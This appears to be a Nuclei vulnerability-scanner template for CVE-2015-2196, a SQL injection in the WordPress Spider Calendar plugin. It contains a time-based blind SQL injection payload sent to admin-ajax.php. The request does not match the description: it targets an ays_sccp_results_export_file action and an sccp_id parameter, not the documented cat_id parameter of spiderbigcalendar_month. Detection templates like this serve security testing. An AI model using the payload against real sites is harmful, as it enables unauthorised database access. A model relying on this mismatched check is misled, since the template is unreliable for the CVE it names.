id: CVE-2015-2196 info: name: WordPress Spider Calendar <=1.4.9 - SQL Injection author: theamanrawat severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site. remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad - https://wordpress.org/plugins/spider-event-calendar/ - http://www.exploit-db.com/exploits/36061 - https://nvd.nist.gov/vuln/detail/CVE-2015-2196 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.00253 epss-percentile: 0.65124 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: web-dorado product: spider_calendar framework: wordpress tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado http: - raw: - | @timeout 10s GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration_1>=6' - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and # digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950